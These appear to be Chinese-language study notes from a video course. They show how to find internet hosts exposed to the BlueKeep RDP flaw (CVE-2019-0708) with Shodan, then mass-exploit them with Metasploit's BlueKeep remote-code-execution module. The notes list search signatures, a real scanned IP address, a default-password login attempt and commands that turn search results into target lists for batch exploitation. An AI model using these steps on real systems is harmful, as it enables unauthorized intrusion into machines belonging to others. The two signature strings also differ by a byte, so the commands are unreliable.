学习视频引路泷羽sec的个人空间-泷羽sec个人主页-哔哩哔哩视频 (bilibili.com)
View shodan(2)
查cve-2019-0708的漏洞
shodan search --limit 10 --fields ip_str,port ' "\x03\x00\x00\x0b\x06\xd0\x00\x00\x124\x00" '
上面这串字符串就是cve-2019-0708的十六进制漏洞特征。
有漏洞不代表能利用。
扫出110.35.235.228端口
以下ip地址有些就能不用验证身份之间远程连接电脑
查询ip地址,可以找到cve-2019-0708的漏洞
默认弱口令:Administrator &Administrator,但是无法连接
metasploit去进行批量的漏洞利用,msfconsole
search 0708
use exploit/windows/rdp/cve_2019_0708_bluekeep_rce
show options
set rhosts file:拖入IP地址文件
check
参数parse,download
download
shodan download -h
shodan download 0708 --limit 100 ' "\x03\x00\x00\x0b\xd0\x00\x00\x124\x00" '
parse
shodan parse -h
shodan parse --fields ip_str 0708
*批量刷漏洞的方式
